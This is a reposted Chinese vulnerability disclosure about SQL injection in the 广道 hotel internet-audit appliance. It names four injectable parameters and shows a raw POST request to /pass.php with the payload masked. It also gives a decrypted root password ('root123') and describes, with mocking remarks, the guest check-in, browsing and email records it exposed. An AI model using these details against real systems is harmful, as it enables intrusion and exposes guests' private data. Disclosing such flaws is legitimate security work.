网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

广道审计系统SQL注入漏洞可致敏感信息泄露 - 网

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 广道审计系统 公司为:深圳市高新技术有限公司详细说明:广道审计系统 公司为:深圳市高新技术有限公司有较多酒店系统采用。该硬件审计系统某页面由于未做过滤,导致存在N个S...

广道审计系统
公司为:深圳市高新技术有限公司

\



广道审计系统

公司为:深圳市高新技术有限公司

有较多酒店系统采用。
 

\



该硬件审计系统某页面由于未做过滤,导致存在N个SQL注入漏洞

其中参数为:Idcard ,mobile ,password ,room


 

上面4个SQL注入漏洞,我选取其中一个注入做为例子



POST /pass.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.100.235:1234/index.php
Cookie: PHPSESSID=2d93e8aa3df024e3942c0ff3a11fbad7
Host: 192.168.100.235:1234
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

button=1&guest_name=ucvbadlr&idcard=1&mobile=**&password=&type=4

C2_EZ823G}BR3OE7ADZLV(5.jpg


 

2W9W@)9ASV@AJPC`_MLW1TS.jpg


 

SD@LE9RQG`RWPR)}9H}BN9V.jpg





root密码解密为: root123
 

}7JF9@RRKLR{}SK{[ET_$W8.jpg


 

OE)FNNYSMFTM@Y{(`18J7Y2.jpg


 

WJAA8X{931OZ5XS${FZ4CUD.jpg



看看这些开房的
 

IUN(Q8MY9Y$T@}GX]FBYAX3.jpg



看看你上过的哪些网页
 

T95EZB@99N}TW{(G9]`83DH.jpg



下载记录
 

1`%X@~WXR071OCC_BSU5UJ4.jpg



是所有监控上网记录。
 

1.jpg


 

2.jpg





还有大量邮箱。。。
 

N%3}{5IO5M2QK{Z1H)]WELV.jpg



看看你在酒店下载过什么片?(快播) 看看你提交了哪些post请求。。。。
 

1.jpg


 

2.jpg

 

漏洞证明:

 

1.jpg


 

2.jpg

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论